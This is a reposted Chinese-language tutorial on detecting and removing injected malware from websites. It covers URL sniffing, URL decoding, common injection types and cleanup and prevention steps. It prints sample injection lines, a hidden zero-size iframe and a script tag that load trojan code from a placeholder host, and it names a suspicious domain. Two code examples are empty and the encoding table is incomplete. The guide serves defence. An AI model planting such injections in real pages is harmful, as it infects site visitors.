如何進行網站掛馬檢測與清除


轉自:http://sec.chinabyte.com/206/8919706.shtml

不完全統計,90%的網站都被掛過馬,掛馬是指在獲取網站或者網站服務器的部分或者全部權限后,在網頁文件中插入一段惡意代碼,這些惡意代碼主要是一些包括IE等漏洞利用代碼,用戶訪問被掛馬的頁面時,如果系統沒有更新惡意代碼中利用的漏洞補丁,則會執行惡意代碼程序,進行盜號等危險超過。目前掛馬主要是為了商業利益,有的掛馬是為了賺取流量,有的是為了盜取游戲等賬號,也有的是為了好玩,不管是處於那種目的,對於訪問被掛馬的網站來說都是一種潛在的威脅,影響運營網站公司形象。

  當一個網站運營很長時間后,網站文件會非常多,手工查看網頁文件代碼非常困難,殺毒軟件僅僅對惡意代碼進行查殺,對網頁木馬以及掛馬程序不一定全部查殺,本文就如何利用一些安全檢測工具軟件來檢測和清除網站木馬方面進行探討,使用本文提及的工具可以很輕松的檢測網站是否被掛馬。

  (一)檢測掛馬頁面

  1.安裝urlsnooper 軟件

  Urlsnooper是一款URL嗅探工具,其官方主頁地址為:http://www.donationcoder.com/urlsnooper,目前已經不提供免費下載了。


  2.對網站進行偵測

  在Urlsnooper中的“Protocol Filter”中選擇“Show All”,然后單擊“Sniff Network”按鈕開始監聽網絡。接着使用IE瀏覽器打開需要進行檢測木馬的網站,Urlsnooper會自動抓取網站中的所有連接,在Index中按照五位數字序號進行排列,在偵測結果中可能包含的連接地址非常多,這個時候就需要進行排查,可以選中每一個記錄,Urlsnooper會在下方中顯示詳細的監聽結果。

3.對地址進行解碼

  該地址采用了一種編碼,我對常用的這種編碼值進行了整理,如下表所示,從中可以找出該代碼中的真實地址為http://ave1.cn。

  表1 編碼對應表

原值

解碼前的值

原值

解碼前的值

原值

解碼前的值

backspace

%08

I

%49

%75

tab

%09

J

%4A

%76

linefeed

%0A

K

%4B

w

%77

creturn

%0D

L

%4C

x

%78

space

%20

M

%4D

y

%79

!

%21

N

%4E

%7A

"

%22

O

%4F

%7B

#

%23

P

%50

%7C

$

%24

Q

%51

}

%7D

%

%25

R

%52

 

 

&

%26

S

%53

 

 

'

%27

T

%54

 

 

(

%28

U

%55

 

 

)

%29

V

%56

 

 

*

%2A

W

%57

 

 

+

%2B

X

%58

 

 

,

%2C

Y

%59

 

 

-

%2D

Z

%5A

 

 

.

%2E

[

%5B

 

 

/

%2F

\

%5C

 

 

0

%30

]

%5D

 

 

1

%31

^

%5E

 

 

2

%32

_

%5F

 

 

3

%33

`

%60

 

 

4

%34

a

%61

 

 

5

%35

b

%62

 

 

6

%36

c

%63

 

 

7

%37

d

%64

 

 

8

%38

e

%65

 

 

9

%39

f

%66

 

 

:

%3A

g

%67

 

 

;

%3B

h

%68

 

 

%3C

i

%69

 

 

=

%3D

j

%6A

 

 

%3E

k

%6B

 

 

?

%3F

l

%6C

 

 

@

%40

m

%6D

 

 

A

%41

n

%6E

 

 

B

%42

o

%6F

 

 

C

%43

p

%70

 

 

D

%44

q

%71

 

 

E

%45

r

%72

 

 

F

%46

s

%73

 

 

G

%47

t

%74

 

 

H

%48

u

%75

 

 

4.獲取該網站相關內容

  可以使用Flashget的資源管理器去獲取該網站的內容,如圖4所示,打開Flashget下載工具,單擊“工具”-“站點資源探索器”,打開站點資源探索器,在地址中輸入“http://ave1.cn”,然后回車即可獲取該網站的一些資源,在站點資源探索器中可以直接下載看見的文件,下載到本地進行查看。

說明:

  使用“Flashget站點資源探索器”可以很方便的獲取掛馬者代碼地址中的一些資源,這些資源可能是掛馬的真實代碼,透過這些代碼可以知道掛馬者是采用哪個漏洞,有時候還可以獲取0day。

5.常見的掛馬代碼

  (1)框架嵌入式網絡掛馬

  網頁木馬被攻擊者利用iframe語句,加載到任意網頁中都可執行的掛馬形式,是最早也是最有效的的一種網絡掛馬技術。通常的掛馬代碼如下:

    <iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

  解釋:在打開插入該句代碼的網頁后,就也就打開了http://www.xxx.com/muma.html頁面,但是由於它的長和寬都為“0”,所以很難察覺,非常具有隱蔽性。

  (2)Js調用型網頁掛馬

  js掛馬是一種利用js腳本文件調用的原理進行的網頁木馬隱蔽掛馬技術,如:黑客先制作一個.js文件,然后利用js代碼調用到掛馬的網頁。通常代碼如下:

    <script language=javascript src=http://www.xxx.com/gm.js></script>

  http://www.xxx.com/gm.js就是一個js腳本文件,通過它調用和執行木馬的服務端。這些js文件一般都可以通過工具生成,攻擊者只需輸入相關的選項就可以了。

  (3)圖片偽裝掛馬

  隨着防毒技術的發展,黑手段也不停地更新,圖片木馬技術逃避殺毒監視的新技術,攻擊者將類似: http://www.xxx.com/test.htm中的木馬代碼植入到test.gif圖片文件中,這些嵌入代碼的圖片都可以用工具生成,攻擊者只需輸入相關的選項就可以了。圖片木馬生成后,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:

  注:當用戶打開http://www.xxx.com/test.htm是,顯示給用戶的是http://www.xxx.com/test.jpg,而http://www.xxx.com/test.htm網頁代碼也隨之運行。

(4)網絡釣魚掛馬(也稱為偽裝調用掛馬)

  網絡中最常見的欺騙手段,黑客們利用人們的獵奇、貪心等心理偽裝構造一個鏈接或者一個網頁,利用社會工程學欺騙方法,引誘點擊,當用戶打開一個看似正常的頁面時,網頁代碼隨之運行,隱蔽性極高。這種方式往往和欺騙用戶輸入某些個人隱私信息,然后竊取個人隱私相關聯。比如攻擊者模仿騰訊公司設計了一個獲取QQ幣的頁面,引誘輸入QQ好和密碼,如圖5所示。等用戶輸入完提交后,就把這些信息發送到攻擊者指定的地方,如圖6。


  圖5 偽裝QQ頁面

  1

  圖6 獲取的QQ密碼

  (5)偽裝掛馬

  高級欺騙,黑客利用IE或者Fixfox瀏覽器的設計缺陷制造的一種高級欺騙技術,當用戶訪問木馬頁面時地址欄顯示www.sina.com或者security.ctocio.com.cn等用戶信任地址,其實卻打開了被掛馬的頁面,從而實現欺騙,示例代碼如:

  

(二)清除網站中的惡意代碼(掛馬代碼)


  1.確定掛馬文件

  清除網站惡意代碼首先需要知道哪些文件被掛馬了,判斷方法有三個,方法一就是通過直接查看代碼,從中找出掛馬代碼;方法二是通過查看網站目錄修改時間,通過時間進行判斷;方法三使用本文提到的軟件進行直接定位,通過監聽找出惡意代碼。


    2.清除惡意代碼

  可以使用記事本打開代碼文件從中清除惡意代碼,在清除代碼時一定要注意不要使用FrontPage的預覽或者設計,否則會直接訪問掛馬網站,感染木馬程序。建議使用記事本等文本編輯器。在清除惡意代碼過程中,發現掛馬者竟然對js文件也不放過


    恢復措施:

       1.整站被掛馬,最快速的恢復方法是,除開數據庫、上傳目錄之外,替換掉其他所有文件;

  2.仔細檢查網站上傳目錄存放的文件,很多木馬偽裝成圖片保存在上傳目錄,你直接把上傳文件夾下載到本地,用縮略圖的形式,查看是不是圖片,如果不顯示,則一律刪除;   3.數據庫里面存在木馬,則把數據庫的木馬代碼清除!可以采用查找替換;   4.如果網站源文件沒有,則需要FTP下載網站文件,然后再DW里面,用替換清除的方式一個個清除,注意網站的木馬數,如果被掛了很多不同的,必須多多檢查!   預防措施 :   1、建議用戶通過ftp來上傳、維護網頁,盡量不安裝asp的上傳程序。   2、對asp上傳程序的調用一定要進行身份認證,並只允許信任的人使用上傳程序。   這其中包括各種新聞發布、 商城 及論壇程序,只要可以上傳文件的asp都要進行身份認證!   3、asp程序管理員的用戶名和密碼要有一定復雜性,不能過於簡單,還要注意定期更換。   4、到正規網站下載asp程序,下載后要對其數據庫名稱和存放路徑進行修改,數據庫文件名稱也要有一定復雜性。   5、要盡量保持程序是最新版本。   6、不要在網頁上加注后台管理程序登陸頁面的鏈接。   7、為防止程序有未知漏洞,可以在維護后刪除后台管理程序的登陸頁面,下次維護時再通過ftp上傳即可。   8、要時常備份數據庫等重要文件。   9、日常要多維護,並注意空間中是否有來歷不明的asp文件。記住:一分汗水,換一分安全!   10、一旦發現被入侵,除非自己能識別出所有木馬文件,否則要刪除所有文件。   11、定期對網站進行安全的檢測,具體可以利用網上一些工具,如億思網站安全檢測平台。




注意!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系我们删除。



 
粤ICP备14056181号  © 2014-2021 ITdaan.com